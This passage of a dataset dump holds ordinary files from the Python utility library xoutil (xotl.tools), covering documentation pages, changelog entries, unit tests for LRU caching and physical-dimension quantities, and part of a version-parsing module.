nameof(target, inner=True, full=True))\n warnings.warn(message, stacklevel=2)\n return target(*args, **kwargs)\n\n return _unstable\n\n\ndel decorator\n" }, { "alpha_fraction": 0.6149019598960876, "alphanum_fraction": 0.6152940988540649, "avg_line_length": 27.0219783782959, "blob_id": "f371a6b92897c70c145632b1ecb6d8f7476abc01", "content_id": "c4f4288d0519cf6c26ecf99516e353a134a29111", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2550, "license_type": "permissive", "max_line_length": 93, "num_lines": 91, "path": "/docs/source/xotl.tools/names.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=================================================================\n `xotl.tools.names`:mod: -- Utilities for handling objects names\n=================================================================\n\n.. automodule:: xotl.tools.names\n\n.. autofunction:: nameof(*objects, depth=1, inner=False, typed=False, full=False, safe=False)\n\n.. autofunction:: identifier_from(obj)\n\n\n.. _name-of-narrative:\n\nUse cases for getting the name of an object\n===========================================\n\nThe function `nameof`:func: is useful for cases when you get a value and you\nneed a name. This is a common need when doing framework-level code that tries\nto avoid repetition of concepts.\n\n\nSolutions with `nameof`:func:\n-----------------------------\n\nProperly calculate the tasks' name in Celery applications\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nCelery_ warns about how to import the tasks. If in a module you import your\ntask using an absolute import, and in another module you import it using a\nrelative import, Celery regards them as different tasks. You must either use\na consistent import style, or give a name for the task. Using `nameof` you\ncan easily fix this problem.\n\nAssume you create a ``celapp.tasks.basic`` module with this code:\n\n.. testsetup:: celapp.tasks.basic\n\n __name__ = 'celapp.tasks.basic'\n\n.. doctest:: celapp.tasks.basic\n\n >>> def celery_task(celeryapp, *args, **kwargs):\n ... def decorator(func):\n ... from xotl.tools.names import nameof\n ... taskname = nameof(func, full=True, inner=True)\n ... return celeryapp.task(name=taskname, *args, **kwargs)(func)\n ... return decorator\n\n >>> from celery import Celery\n >>> app = Celery()\n >>> @celery_task(app)\n ... def add(x, y):\n ... return x + y\n\nThen importing the task directly in a shell will have the correct name::\n\n >>> from celapp.tasks.basic import add\n >>> add.name\n 'celapp.tasks.basic.add'\n\nAnother module that imports the task will also see the proper name. Say you\nhave the module ``celapp.consumer``:\n\n\n.. testsetup:: celapp.consumer\n\n __name__ = 'celapp.consumer'\n\n\n.. doctest:: celapp.consumer\n\n >>> from .tasks import basic\n\n >>> def get_name(taskname):\n ... task = getattr(basic, taskname)\n ... return task.name\n\nThen:\n\n.. doctest::\n\n >>> from celapp.consumer import get_name\n >>> get_name('add')\n 'celapp.tasks.basic.add'\n\n\nDespite that you imported the ``basic`` module with a relative import the name\nis fully calculated.\n\n\n.. _Celery: http://celeryproject.org/\n" }, { "alpha_fraction": 0.7361963391304016, "alphanum_fraction": 0.7361963391304016, "avg_line_length": 39.75, "blob_id": "9f2404df855d997ba009a338713d12627c20550f", "content_id": "3d526a2043774fdfa58df8a1b86b313347938284", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 163, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/docs/source/history/_changes-1.6.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- The `defaults` argument in `xoutil.objects.smart_copy`:func: is now\n keyword-only.\n\n- `xoutil.context`:mod: is now greenlet-safe without depending of `gevent`.\n" }, { "alpha_fraction": 0.6577181220054626, "alphanum_fraction": 0.6599552631378174, "avg_line_length": 30.928571701049805, "blob_id": "8701a75524bafa77d18a31837056e66d929f7299", "content_id": "e43241f5ea9a9645530c54eadc0dbbbe849d679e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 447, "license_type": "permissive", "max_line_length": 76, "num_lines": 14, "path": "/docs/source/history/_changes-1.6.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix encoding issues in `xoutil.string.cut_prefix`:func: and\n `xoutil.string.cut_suffix`:func:.\n\n Previously this code failed::\n\n >>> from xoutil.string import cut_prefix\n >>> cut_prefix(u'-\\xe1', '-')\n Traceback ...\n ...\n UnicodeEncodeError: 'ascii' ...\n\n Now both functions force its second argument to be of the same type of the\n first. See `xoutil.string.safe_decode`:func: and\n `xoutil.string.safe_encode`:func:.\n" }, { "alpha_fraction": 0.751724123954773, "alphanum_fraction": 0.7586206793785095, "avg_line_length": 71.5, "blob_id": "976f4c178c99e414c1fc98bd8ec08f5550e7f1d4", "content_id": "7f87e032be463c1cda500310dd2eb0973b9b3389", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 145, "license_type": "permissive", "max_line_length": 78, "num_lines": 2, "path": "/docs/source/history/_changes-1.7.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix a bug in `xoutil.datetime.TimeSpan`:class: for Python 2. Representing a\n time span might fail with a 'Maximum Recursion Detected' error.\n" }, { "alpha_fraction": 0.5051029920578003, "alphanum_fraction": 0.5399888753890991, "avg_line_length": 31.859756469726562, "blob_id": "2bd4e2ebfa4355b70b599b4ae4de0384918eefbd", "content_id": "42d0b0d87bbdf162d81d7120cd022eba7ddffbfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5389, "license_type": "no_license", "max_line_length": 81, "num_lines": 164, "path": "/tests/test_functools2.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# Copied from Python 3.3 base code\n#\n# Copyright (c) 2001-2012, 2017 Python Software Foundation. All rights reserved.\n#\n\nfrom xoutil.future import functools\nimport unittest\nfrom random import choice\n\n\nclass TestLRU(unittest.TestCase):\n def test_lru(self):\n def orig(x, y):\n return 3 * x + y\n\n f = functools.lru_cache(maxsize=20)(orig)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(maxsize, 20)\n self.assertEqual(currsize, 0)\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 0)\n\n domain = range(5)\n for i in range(1000):\n x, y = choice(domain), choice(domain)\n actual = f(x, y)\n expected = orig(x, y)\n self.assertEqual(actual, expected)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertTrue(hits > misses)\n self.assertEqual(hits + misses, 1000)\n self.assertEqual(currsize, 20)\n\n f.cache_clear() # test clearing\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 0)\n self.assertEqual(currsize, 0)\n f(x, y)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 1)\n self.assertEqual(currsize, 1)\n\n # Test bypassing the cache\n self.assertIs(f.__wrapped__, orig)\n f.__wrapped__(x, y)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 1)\n self.assertEqual(currsize, 1)\n\n # test size zero (which means \"never-cache\")\n @functools.lru_cache(0)\n def f():\n global f_cnt\n f_cnt += 1\n return 20\n\n self.assertEqual(f.cache_info().maxsize, 0)\n global f_cnt\n f_cnt = 0\n for i in range(5):\n self.assertEqual(f(), 20)\n self.assertEqual(f_cnt, 5)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 5)\n self.assertEqual(currsize, 0)\n\n # test size one\n @functools.lru_cache(1)\n def f():\n global f_cnt\n f_cnt += 1\n return 20\n\n self.assertEqual(f.cache_info().maxsize, 1)\n f_cnt = 0\n for i in range(5):\n self.assertEqual(f(), 20)\n self.assertEqual(f_cnt, 1)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 4)\n self.assertEqual(misses, 1)\n self.assertEqual(currsize, 1)\n\n # test size two\n @functools.lru_cache(2)\n def f(x):\n global f_cnt\n f_cnt += 1\n return x * 10\n\n self.assertEqual(f.cache_info().maxsize, 2)\n f_cnt = 0\n for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:\n # * * * *\n self.assertEqual(f(x), x * 10)\n self.assertEqual(f_cnt, 4)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 12)\n self.assertEqual(misses, 4)\n self.assertEqual(currsize, 2)\n\n def test_lru_with_maxsize_none(self):\n @functools.lru_cache(maxsize=None)\n def fib(n):\n if n < 2:\n return n\n return fib(n - 1) + fib(n - 2)\n\n self.assertEqual(\n [fib(n) for n in range(16)],\n [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610],\n )\n self.assertEqual(\n fib.cache_info(),\n functools._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16),\n )\n fib.cache_clear()\n self.assertEqual(\n fib.cache_info(),\n functools._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0),\n )\n\n def test_lru_with_exceptions(self):\n # Verify that user_function exceptions get passed through without\n # creating a hard-to-read chained exception.\n # http://bugs.python.org/issue13177\n for maxsize in (None, 100):\n\n @functools.lru_cache(maxsize)\n def func(i):\n return \"abc\"[i]\n\n self.assertEqual(func(0), \"a\")\n with self.assertRaises(IndexError) as cm: # noqa\n func(15)\n # The following is only valid in Py33 PEP 3143\n ## self.assertIsNone(cm.exception.__context__)\n\n # Verify that the previous exception did not result in a cached\n # entry\n with self.assertRaises(IndexError):\n func(15)\n\n def test_lru_with_types(self):\n for maxsize in (None, 100):\n\n @functools.lru_cache(maxsize=maxsize, typed=True)\n def square(x):\n return x * x\n\n self.assertEqual(square(3), 9)\n self.assertEqual(type(square(3)), type(9))\n self.assertEqual(square(3.0), 9.0)\n self.assertEqual(type(square(3.0)), type(9.0))\n self.assertEqual(square(x=3), 9)\n self.assertEqual(type(square(x=3)), type(9))\n self.assertEqual(square(x=3.0), 9.0)\n self.assertEqual(type(square(x=3.0)), type(9.0))\n self.assertEqual(square.cache_info().hits, 4)\n self.assertEqual(square.cache_info().misses, 4)\n" }, { "alpha_fraction": 0.6540642976760864, "alphanum_fraction": 0.6654064059257507, "avg_line_length": 28.38888931274414, "blob_id": "20738746f81d4cf0080cdfb0bc997623d7c1573e", "content_id": "2b7ecb800603f35d2c1e8f90f266baa5d4ea87f8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 529, "license_type": "permissive", "max_line_length": 78, "num_lines": 18, "path": "/docs/source/xotl.tools/future/textwrap.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.textwrap`:mod: - Text wrapping and filling\n=============================================================\n\n.. module:: xotl.tools.future.textwrap\n\nThis module extends the standard library's `textwrap`:mod:. You may use it as\na drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: dedent\n\nWe have backported several Python 3.3 features but maybe not all.\n\n.. autofunction:: indent\n" }, { "alpha_fraction": 0.7407932281494141, "alphanum_fraction": 0.743626058101654, "avg_line_length": 36.157894134521484, "blob_id": "8e713ff4460d6cefdfcafb757f5c24bb376fd3ac", "content_id": "115bc962796ab355077a1722200766e58a822b1b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 706, "license_type": "permissive", "max_line_length": 73, "num_lines": 19, "path": "/docs/source/history/_changes-1.8.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Remove deprecated `xoutil.objects.get_and_del_first_of`:func:,\n `xoutil.objects.smart_getattr`:func:, and\n `xoutil.objects.get_and_del_attr`:func:.\n\n- Remove deprecated arguments from `xoutil.objects.xdir`:func: and\n `xoutil.objects.fdir`:func:.\n\n- Fix bug #17: `xoutil.fp.tools.compose`:class: is not wrappable.\n\n- Move `xoutil.decorator.memoized_property`:class: to\n `xoutil.objects.memoized_property`:class: module. Deprecate the first.\n\n- Deprecate `xoutil.decorator.memoized_instancemethod`:class:.\n\n- Deprecate `xoutil.decorator.reset_memoized`:func:. Use\n `~xoutil.decorator.memoized_property.reset`:meth:.\n\n- Fix bug (unregistered): `xoutil.objects.traverse`:func: ignores its\n `getter`.\n" }, { "alpha_fraction": 0.6191198825836182, "alphanum_fraction": 0.6221547722816467, "avg_line_length": 17.828571319580078, "blob_id": "44a1250122413defb5e6db5e6e78ea0396a6565c", "content_id": "50dcb4cc0cf824caf6e7d28d1d3b421ff83c68f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 660, "license_type": "no_license", "max_line_length": 75, "num_lines": 35, "path": "/tests/testbed.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"This module simply serves the purposes of the testing weaving modules\"\"\"\n\nfrom xoutil.modules import moduleproperty, modulemethod\n\n\ndef echo(what):\n return what\n\n\n@moduleproperty\ndef this(self):\n return self\n\n\ndef rien():\n return 1\n\n\n@modulemethod\ndef method(self, *args, **kwargs):\n return self, args, kwargs\n\n\n@modulemethod\ndef selfish(self):\n return self.selfish, selfish\n" }, { "alpha_fraction": 0.6309962868690491, "alphanum_fraction": 0.6457564830780029, "avg_line_length": 26.100000381469727, "blob_id": "ca5a4c9451cd8561b941691fa077d34ea804d956", "content_id": "2a7ca238545e131382eadf2395f1aaf1db2f196b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 543, "license_type": "permissive", "max_line_length": 77, "num_lines": 20, "path": "/docs/source/xotl.tools/future/csv.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.csv`:mod: - CSV parsing and writing extensions\n=================================================================\n\n.. module:: xotl.tools.future.csv\n\n.. versionadded:: 1.8.4\n\nThis module extends the standard library's `csv`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autoclass:: unix_dialect\n\n Added only in Python 2 for compatibility purposes.\n\n.. autofunction:: parse\n" }, { "alpha_fraction": 0.6028416752815247, "alphanum_fraction": 0.6171854138374329, "avg_line_length": 22.915857315063477, "blob_id": "3d66ff2c7eaa9dcef7942cd78d234c7bb24ce7f6", "content_id": "d9b509828d96b128bb80ed81a2d81db22e6720e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7391, "license_type": "no_license", "max_line_length": 76, "num_lines": 309, "path": "/tests/test_dim.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom hypothesis import given, strategies as s\n\nfrom xoutil.dim.meta import Signature, Quantity, Dimension, Scalar, UNIT\n\n\n# A reasonable exponent. We won't be dealing with universes of 100s\n# dimensions.\nexponents = s.integers(min_value=1, max_value=10)\nsignatures = s.text(alphabet=\"abcdefghijok\", min_size=0, max_size=10)\n\n\ndef test_usage():\n @Dimension.new\n class L:\n metre = UNIT\n kilometre = 1000 * metre\n\n @Dimension.new\n class T:\n second = UNIT\n\n m, km = L.metre, L.kilometre\n s = T.second\n\n assert isinstance(m, L)\n assert not isinstance(1, L)\n assert isinstance(s, T)\n\n assert -km == -1 * km == -(1000 * m)\n assert +km == km\n\n Speed = L / T\n\n assert isinstance(m / s, Speed)\n assert not isinstance(m, T)\n\n assert hasattr(L / T, \"metre_per_second\")\n\n assert 10 * km == 10000 * m\n assert m < km\n\n with pytest.raises(TypeError):\n 10 + 10 * km\n\n with pytest.raises(TypeError):\n m + s\n\n assert Speed.metre_per_second == m / s\n\n Acceleration = L / (T * T)\n assert hasattr(Acceleration, \"metre_per_second_squared\")\n # however:\n Not_Acceleration = L / T * T\n assert hasattr(Not_Acceleration, \"metre_per_second_second\")\n assert L == Not_Acceleration, \"It is the same as Length\"\n\n\ndef test_effort():\n @Dimension.new\n class Workforce:\n men = UNIT\n\n @Dimension.new\n class Time:\n second = UNIT\n\n class Effort(Workforce * Time):\n # Since the canonical unit of a composed quantity type is built from\n # the canonical units of the operands, but the true \"canonical type\"\n # of effort is usually men-hour we re-introduce it.\n men_hour = 60\n\n assert Effort.men_hour > Effort.men_second\n\n\ndef test_scalar_downgrade():\n from xoutil.dim.base import L\n\n km = L.km\n assert not isinstance(km / km, Quantity)\n assert km / km == 1\n assert not isinstance(km // km, Quantity)\n assert km // km == 1\n\n assert not isinstance(1 / km * km, Quantity)\n assert float(1 / km * km)\n\n\ndef test_natural_downgrade():\n from xoutil.dim.base import L\n\n km, cm = L.km, L.cm\n assert float(km) == 1000\n assert int(cm) == 0\n\n\ndef test_decimals():\n import decimal\n from xoutil.dim.base import m\n\n with pytest.raises(TypeError):\n third = decimal.Decimal(\"0.33\") * m\n assert third < m\n\n\ndef test_signatures():\n distance = Signature(\"m\")\n time = Signature(\"s\")\n freq = 1 / time\n speed = distance / time\n acceleration = speed / time\n assert acceleration == distance / (time * Signature(\"s\"))\n assert speed == distance * freq\n assert speed ** 3 == speed * speed * speed\n assert speed ** 0 == Signature() == speed / speed\n assert speed ** -3 == 1 / (speed ** 3)\n\n\n@given(signatures, signatures)\ndef test_signatures_are_always_simplified(top, bottom):\n s = Signature(top, bottom)\n assert all(t not in s.bottom for t in s.top)\n assert all(b not in s.top for b in s.bottom)\n r = Signature(bottom, top)\n assert s.top == r.bottom and s.bottom == r.top\n\n s2 = Signature(top + bottom, bottom)\n assert s2 == Signature(top, None)\n s3 = Signature(top, top + bottom)\n assert s3 == Signature(None, bottom)\n\n\ndef test_quantity_math():\n metre = m = Quantity(1, Signature(\"m\"))\n second = Quantity(1, Signature(\"s\"))\n\n with pytest.raises(TypeError):\n metre < second\n\n assert metre < 2 * metre < (metre + 2 * metre)\n assert metre * metre == Quantity(1, Signature(\"mm\"))\n assert metre / second == Quantity(1, Signature(\"m\", \"s\"))\n assert metre * metre * metre == metre ** 3\n assert 1 / (metre * metre * metre) == metre ** -3\n\n assert 1000 * m % 3 == 1 * m\n assert 5 % (2 * m) == 1 / m\n assert 5 / (2 * m) == 2.5 / m\n\n with pytest.raises(TypeError):\n 5 ** (2 * m)\n\n\ndef test_quantity_type_definitions():\n from xoutil.dim.base import Length, Time\n\n assert isinstance(Length, Dimension)\n assert isinstance(Time, Dimension)\n assert isinstance(Length / Time, Dimension)\n assert isinstance(Length ** 2, Dimension)\n assert Length * Length == Length ** 2\n\n assert Time / Time == Scalar\n assert Time / Time * Time == Time\n\n with pytest.raises(TypeError):\n Length + Time\n\n with pytest.raises(TypeError):\n Length - Time\n\n assert Length ** 1 is Length\n\n with pytest.raises(TypeError):\n Length ** 1.2\n\n assert Length ** 0 == Scalar\n assert Length ** -1 == 1 / Length\n\n with pytest.raises(TypeError):\n 2 / Length\n\n with pytest.raises(TypeError):\n 2 * Length\n\n\n@given(exponents, exponents)\ndef test_general_power_rules(n, m):\n from xoutil.dim.base import L\n\n assert L ** n / L ** m == L ** (n - m)\n\n\n@given(s.floats(allow_nan=False) | s.integers())\ndef test_any_magnitude(m):\n from xoutil.dim.base import L\n\n assert float(m * L.metre) == float(m)\n\n\n@given(s.floats(allow_nan=False, allow_infinity=False) | s.integers())\ndef test_any_magnitude_noinf(m):\n from xoutil.dim.base import L\n from math import ceil, floor\n\n Int = int\n q = m * L.metre\n for f in (Int, float, abs, round, ceil, floor):\n assert f(q) == f(m)\n\n\ndef test_currencies():\n from xoutil.dim.currencies import Rate, Valuation, currency\n\n dollar = USD = currency(\"USD\")\n euro = EUR = currency(\"EUR\")\n rate = 1.19196 * USD / EUR\n\n assert isinstance(dollar, Valuation)\n assert isinstance(rate, Rate)\n\n # Even 0 dollars are a valuation\n assert isinstance(dollar - dollar, Valuation)\n\n # But 1 is not a value nor a rate\n assert not isinstance(dollar / dollar, Valuation)\n assert not isinstance(dollar / dollar, Rate)\n\n assert currency(\"a\") is currency(\"A\")\n\n with pytest.raises(TypeError):\n dollar + euro\n\n\ndef test_undistinguishable_definitions():\n from xoutil.dim.base import L\n\n @Dimension.new\n class Length:\n metre = UNIT\n\n assert L.metre == Length.metre\n\n @Dimension.new\n class Length:\n km = UNIT\n\n with pytest.raises(TypeError):\n assert L.metre != Length.km\n\n\ndef test_bug_30():\n from xoutil.dim.meta import Dimension, UNIT\n\n @Dimension.new\n class L:\n m = UNIT\n\n with pytest.raises(TypeError):\n\n class LL(L):\n mm = UNIT\n\n\ndef test_custom_quantity():\n class NewQuantity(Quantity):\n pass\n\n class NewDim(Dimension):\n Quantity = NewQuantity\n\n @NewDim.new\n class Length:\n m = UNIT\n\n m = Length.m\n Area = Length ** 2\n\n assert isinstance(m, NewQuantity)\n assert isinstance(1000 * m, NewQuantity)\n assert isinstance(Area._unit_, NewQuantity)\n\n @Dimension.new(Quantity=NewQuantity)\n class Time:\n s = UNIT\n\n Freq = 1 / Time\n assert isinstance(Time.s, NewQuantity)\n assert isinstance(Freq._unit_, NewQuantity)\n\n @NewDim.new(Quantity=Quantity)\n class Time:\n s = UNIT\n\n Freq = 1 / Time\n assert not isinstance(Time.s, NewQuantity)\n assert isinstance(Time.s, Quantity)\n assert not isinstance(Freq._unit_, NewQuantity)\n assert isinstance(Freq._unit_, Quantity)\n" }, { "alpha_fraction": 0.7301587462425232, "alphanum_fraction": 0.7301587462425232, "avg_line_length": 46.25, "blob_id": "ffc1c74605d5271ae1f49d193043af6aa3180551", "content_id": "f7cd782e1df7d861d69dbe3b3b372ee31546bdb4", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 189, "license_type": "permissive", "max_line_length": 78, "num_lines": 4, "path": "/docs/source/history/_changes-1.9.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add parameter 'encoding' to `xoutil.eight.string.force`:func: and\n `xoutil.eight.string.safe_join`:func:.\n\n- Add `xoutil.fp.iterators`:mod: and `xoutil.fp.iterators.iter_compose`:func:.\n" }, { "alpha_fraction": 0.4535315930843353, "alphanum_fraction": 0.45724907517433167, "avg_line_length": 16.933332443237305, "blob_id": "0eb435af3eb2fa8f7c0373add09e1d10514224fe", "content_id": "16f835c3f49cfb2c18b9c15aff10a4bec30e7b54", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 269, "license_type": "permissive", "max_line_length": 73, "num_lines": 15, "path": "/docs/source/xotl.tools/future.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future`:mod: - Extend standard modules with \"future\" features\n=========================================================================\n\n.. automodule:: xotl.tools.future\n :members:\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n future/*\n" }, { "alpha_fraction": 0.4434782564640045, "alphanum_fraction": 0.48695650696754456, "avg_line_length": 45, "blob_id": "4c16f8fc5eaf870123e0220737d8decedcc777cf", "content_id": "1c17fe550e14f5e460004ca4f4df91bcf3d6c30d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 230, "license_type": "permissive", "max_line_length": 77, "num_lines": 5, "path": "/docs/source/xotl.tools/bases.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.bases`:mod: - Numeric base 32 and base 64 integer representations\n=============================================================================\n\n.. automodule:: xotl.tools.bases\n :members: int2str, str2int, B32, B64\n" }, { "alpha_fraction": 0.6213425397872925, "alphanum_fraction": 0.6230636835098267, "avg_line_length": 28.049999237060547, "blob_id": "0105e31202978505c453e73c130623c7a75af44b", "content_id": "0616c8410dc22d8dd460a5e5dd908a7b37fa37e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 76, "num_lines": 20, "path": "/xotl/tools/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\"\"\"Collection of disparate utilities.\n\n``xotl.tools`` is essentially an extension to the Python's standard library,\nit does not make up a full framework, but it's very useful to be used from a\ndiversity of scenarios.\n\n\"\"\"\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n" }, { "alpha_fraction": 0.5383942723274231, "alphanum_fraction": 0.5432026982307434, "avg_line_length": 27.4771785736084, "blob_id": "099e19b63126de6a5949a946f053cf5ac4dc7145", "content_id": "ca32a923d3f56dc59ee0b1b11b6cc69c21e7b307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6864, "license_type": "no_license", "max_line_length": 80, "num_lines": 241, "path": "/xotl/tools/versions.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n# TODO: Document (version.rst) this module. Add tests.\n\"\"\"Versions API\n\n\"\"\"\n\nfrom xotl.tools.decorator import singleton\n\n\ndef _check(info):\n \"\"\"Validate a version info.\n\n :param info: could be a string, an integer, float, or any integer\n collection (only first three valid integers are used).\n\n :returns: a valid tuple or an error if invalid.\n\n \"\"\"\n from collections import Iterable\n from distutils.version import LooseVersion, StrictVersion\n\n MAX_COUNT = 3\n if isinstance(info, (int, float)):\n aux = str(info)\n elif isinstance(info, Iterable) and not isinstance(info, str):\n aux = \".\".join(map(str, info))\n else:\n aux = info\n if isinstance(aux, str):\n try:\n essay = StrictVersion(aux)\n except (TypeError, ValueError): # Being as safe as possible.\n essay = LooseVersion(aux)\n res = essay.version[:MAX_COUNT]\n if any(res):\n return tuple(res)\n else:\n raise ValueError(\"invalid version value '{}'\".format(info))\n else:\n msg = \"Invalid type '{}' for version '{}'\"\n raise TypeError(msg.format(type(info).__name__, info))\n\n\nclass ThreeNumbersVersion(tuple):\n \"\"\"Structured version info considering valid first 3 members\n\n This class is mainly intended to be sub-classed as a singleton resulting\n in a tuple with three integer components as 'major', 'minor', and 'micro'.\n\n Instances of this class can be compared with a variety of value types:\n\n - An integer with the 'major' component.\n\n - A float with the ('major', 'minor') components.\n\n - A string is converted to a version tuple before compare it.\n\n - Any collection with a prefix of at least three logical integers (that is\n ``[1.3, '2a']`` is the same as ``'1.3.2a'`` and ``(1, 3, 2)``).\n\n Equality comparison is relevant only for heading values: ``3.1 == 3``.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n def __new__(cls, info):\n MAX_COUNT = 3\n head = _check(info)\n tail = (0,) * (MAX_COUNT - len(head))\n return super().__new__(cls, head + tail)\n\n @property\n def major(self):\n return self[0]\n\n @property\n def minor(self):\n return self[1]\n\n @property\n def micro(self):\n return self[2]\n\n def to_float(self):\n return float(\"{}.{}\".format(*self[:2]))\n\n __float__ = to_float\n __trunc__ = major\n\n def __eq__(self, other):\n try:\n aux = _check(other)\n this = self[: len(aux)]\n return this == aux\n except (TypeError, ValueError):\n return False\n\n def __lt__(self, other):\n try:\n return tuple(self) < _check(other)\n except (TypeError, ValueError):\n return NotImplemented\n\n def __gt__(self, other):\n try:\n return tuple(self) > _check(other)\n except (TypeError, ValueError):\n return NotImplemented\n\n def __ne__(self, other):\n return not (self == other)\n\n def __le__(self, other):\n return not (self > other)\n\n def __ge__(self, other):\n return not (self < other)\n\n\n@singleton\nclass python_version(ThreeNumbersVersion):\n \"\"\"Current Python version.\n\n Initialized with `~sys.version_info`:obj: 5 components tuple.\n\n Extra components (besides 'major', 'minor', and 'micro') are:\n 'releaselevel' (a string that could be 'alpha', 'beta', 'candidate', or\n 'final'), and 'serial' (an integer). The attribute 'pypy' could be used\n to determine if this is a PyPy instance or not.\n\n \"\"\"\n\n def __new__(cls):\n import sys\n\n self = super().__new__(cls, sys.version_info)\n self.pypy = sys.version.find(\"PyPy\") >= 0\n return self\n\n @property\n def releaselevel(self):\n return self[3]\n\n @property\n def serial(self):\n return self[4]\n\n\ndef _get_mod_version(mod):\n \"\"\"Get a valid version from a module.\n\n Used internally by `PackageVersion`:class:.\n\n \"\"\"\n valid_names = (\n \"VERSION_INFO\",\n \"VERSION\",\n \"version_info\",\n \"version\",\n \"__VERSION__\",\n \"__version__\",\n )\n i = 0\n res = None\n while res is None and i < len(valid_names):\n name = valid_names[i]\n version = getattr(mod, name, None)\n if version is not None:\n try:\n res = _check(version)\n except (TypeError, ValueError):\n pass\n i += 1\n if not res:\n import os\n\n path = os.path.dirname(os.__file__)\n if 